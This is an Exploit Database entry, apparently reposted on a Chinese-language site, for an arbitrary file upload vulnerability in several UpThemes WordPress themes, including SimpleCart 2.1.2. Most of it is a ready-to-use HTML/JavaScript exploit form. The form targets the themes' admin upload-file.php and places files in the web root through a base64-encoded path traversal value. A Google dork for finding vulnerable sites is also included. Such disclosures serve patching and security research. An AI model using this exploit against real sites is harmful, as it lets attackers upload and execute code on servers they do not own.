Multiple WordPress UpThemes Themes – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： Divya
  日期： 2015-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36611/

• # Exploit Title: WordPress SimpleCart Theme File Upload and Execution
  # Google Dork: inurl:/wp-content/themes/simplecart
  # Date: 31 March 2015
  # Exploit Author: Divya
  # Vendor Homepage: https://github.com/UpThemes/
  # Software Link: https://github.com/UpThemes/SimpleCart-Theme
  # Version: 2.1.2
  # Tested on: Windows, Linux
  # CVE : None
  #
  # Other Themes:
  # Micro Theme 1.0.3: https://github.com/UpThemes/Micro-Theme
  # Holding Pattern Theme 1.3: https://github.com/UpThemes/Holding-Pattern-Theme
  # Gallery Pro Theme 2.5.3: https://github.com/UpThemes/Gallery-Pro-Theme/
  # Evo Theme 1.3: https://github.com/UpThemes/Evo-Theme
  # Charity Theme 1.1.3: https://github.com/UpThemes/Charity-Theme/
  
  <html>
  <head>
  <title>WP Theme Exploit</title>
  <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/md5.js"></script>
  <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/components/enc-base64-min.js"></script>
  <script>
  function process_data()
  {
  	var proto = "http://";
  	if (document.getElementById('rb1').checked)
  	{
  		proto = document.getElementById('rb1').value;
  	}
  	var targetip = document.getElementById('targetip').value;
  	var filepath = document.getElementById('vfile').value;
  	var formaction = proto.concat(targetip,filepath);
  	document.getElementById("myform").setAttribute("action", formaction);
  	document.getElementById("file1").setAttribute("name", CryptoJS.MD5(document.getElementById('targetip').value));
  	return true;
  }
  </script>
  </head>
  <body>
  <form id="myform" name="myform" action="#" method="post" enctype="multipart/form-data">
  	Target IP: <input type="text" id="targetip" name="targetip">
  	<input type="radio" id="rb1" name="rb1" value="http://" checked>HTTP 
  	<input type="radio" id="rb1" name="rb1" value="https://">HTTPS <br>
  	Upload File: <input type="file" id="file1" name="n1"><br> <!--name="00958fd0af98291fdf517e3fe763da5c"-->
  	Upload Path: <input type="text" id="upload_path" name="upload_path" value="Li4vLi4vLi4vLi4v"><br><br>
  	<fieldset>
  	<legend>Base64 Encoded value (without double quotes)</legend>
  	1. "Li4vLi4vLi4vLi4v" for website root directory upload.<br>
  	2. "Lg==" for current directory upload.<br>
  	</fieldset><br>
  	Vulnerable File: <input type="text" id="vfile" name="vfile" value="/wp-content/themes/simplecart/admin/upload-file.php" size="100%"><br><br>
  	<input type="submit" value="Exploit" onClick="process_data()">
  </form>
  </body>
  </html>